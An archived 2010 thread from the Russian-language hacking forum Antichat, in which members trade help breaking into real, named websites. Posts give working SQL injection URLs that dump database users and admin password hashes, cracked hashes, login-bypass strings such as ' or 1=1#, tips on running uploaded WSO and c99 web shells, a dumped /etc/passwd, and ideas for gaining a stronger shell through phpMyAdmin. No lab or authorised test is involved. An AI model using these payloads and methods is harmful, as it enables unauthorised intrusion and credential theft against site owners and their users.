ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.03.2010, 22:23
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от jecka3000
не могу проверить привилегии
http://www.tourisme-boulognesurmer.com/shopping.php?id=-25+union+select+1,file_priv,3,4,5,6,7+from+mysql.u ser+where+user='tourismepmysql'--
доступ к mysql.user вродь есть, в чем трабла?
Код:
http://www.tourisme-boulognesurmer.com/shopping.php?id=-25+union+select+1,user,3,4,5,6,7+from+mysql.user--
SELECT command denied to user: 'tourismepmysql@10.0.65.117' for table 'user'
1. Нет прав на таблу mysql.user - не проверишь
2. Magic_quotes = ON, where user = 0x746f757269736d65706d7973716c
3. Слушать BlackSun, но помнить про Magic_quotes = ON
|
|
|
31.03.2010, 02:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от Strilo4ka
бес брута достать логин и пасс возможно!? При обращении к схеме у меня была ошибка... Разве что с not null попробывать.
Код:
_http://www.plan-art.co.uk/case.php?id=116+and+%281,2%29=%28select+*+from+%28select+name_const%28version%28%29,1%29,name_const%28version%28%29,1%29+from+admin%29a%20%29
Ы_Ы
Решено :
_http://www.plan-art.co.uk/case.php?id=116+and+%28select+*+from+admin+union+s elect+1,2%0%29=%281,2%29
Query failed: Column 'password' cannot be null
_http://www.plan-art.co.uk/case.php?id=116+and+%28select+*+from+admin+union+s elect+1%0,2%29=%281,2%29
Query failed: Column 'username' cannot be null
Тока таблица admin пустая1
Что со схемой - ХЗ! 
Последний раз редактировалось Strilo4ka; 31.03.2010 в 02:40..
|
|
|
|
31.03.2010, 11:30
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от daniel_1024
я только что залил шелл wso 2.4 на сайт, но при попытке зайти пишется:
Fatal error: Call to undefined function: gzinflate()
сервер - Apache/2.0.59 (Unix) PHP/4.4.6
c99 нормально работает, но всё-таки хотелось бы узнать причину..
Для работы функции gzinflate необходима библиотека zlib, она появилась в php с версии 4.0.4. По умолчанию поддержка этой библиотеки в PHP не включена. Так что можешь попробовать покапаться в исходниках wso и найти упакованную строку функцией gzdeflate и распаковать у себя, а на сервак залить уже без использования этих функций
|
|
|
|
31.03.2010, 12:33
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
На этом сайте:
http://qatarlc.net/page.php?id=-15+union+select+1,concat_ws(0x3a,id,username,passw ord),3,4,5,6,7,8+from+test.admin+--+
у админа странный хэш:
1:super:202cb962ac59075b964b07152d234b70200820e322 7815ed1756a6b531e7e0d2
админка тут:
http://qatarlc.net/admin/
Подбор хэша:
202cb962ac59075b964b07152d234b70 - 123
200820e3227815ed1756a6b531e7e0d2 - qwe123
Но, это не проходит.
Как еще можно подобрать хэш, чтобы попасть а админку?
|
|
|
|
31.03.2010, 12:59
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
FlaktW,
login: 'or+5=5/*
password: asdfgh
 |
|
|
|
31.03.2010, 14:10
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от FlaktW
На этом сайте:
http://qatarlc.net/page.php?id=-15+union+select+1,concat_ws(0x3a,id,username,passw ord),3,4,5,6,7,8+from+test.admin+--+
А почему ты решил, что БД test, а не qatarlc_DB, как говорится в database()?
warlok, или login: ' or 1=1#
password: qwerty
Последний раз редактировалось mr.celt; 31.03.2010 в 14:14..
|
|
|
|
31.03.2010, 15:06
|
|
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
Провел на форуме:
436858
Репутация:
33
|
|
на руках лежит "/etc/passwd". как его рационально использовать? можно на фтп попасть?
# $FreeBSD: src/etc/master.passwd,v 1.40.20.1 2009/04/15 03:14:26 kensmith Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64  flogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
webmaster:*:1001:0:User &:/home/webmaster:/bin/sh
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
ftp:*:14:5:Anonymous Ftp:/var/ftp:/nonexistent cпасибо! |
|
|
|
31.03.2010, 15:31
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
olishort
Нельзя. Пассы можно увидеть в master.passwd, но для этого надо иметь права высокие.
|
|
|
|
31.03.2010, 18:56
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
если у тебя file_priv:Y (есть возможность читать файлы на сервере), попробуй читать исходники страниц сайта...это может очень помочь
|
|
|
|
31.03.2010, 19:08
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Собственно вопрос знатокам, есть шелл на сервере под виндой, права типо зеленые , но! ничего там не сделать ни править, ни закачать..., захожу в практически любую папку на серванте, нужен пароль от юзера БД (MYSQL), из конфигов вычитал другого юзверя но у него мало прав.Собственно хочу через пхпмайадмин залить другой шелл, может справами будет получше..или другие идейки как мне заполучить нормально работающий шелл
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
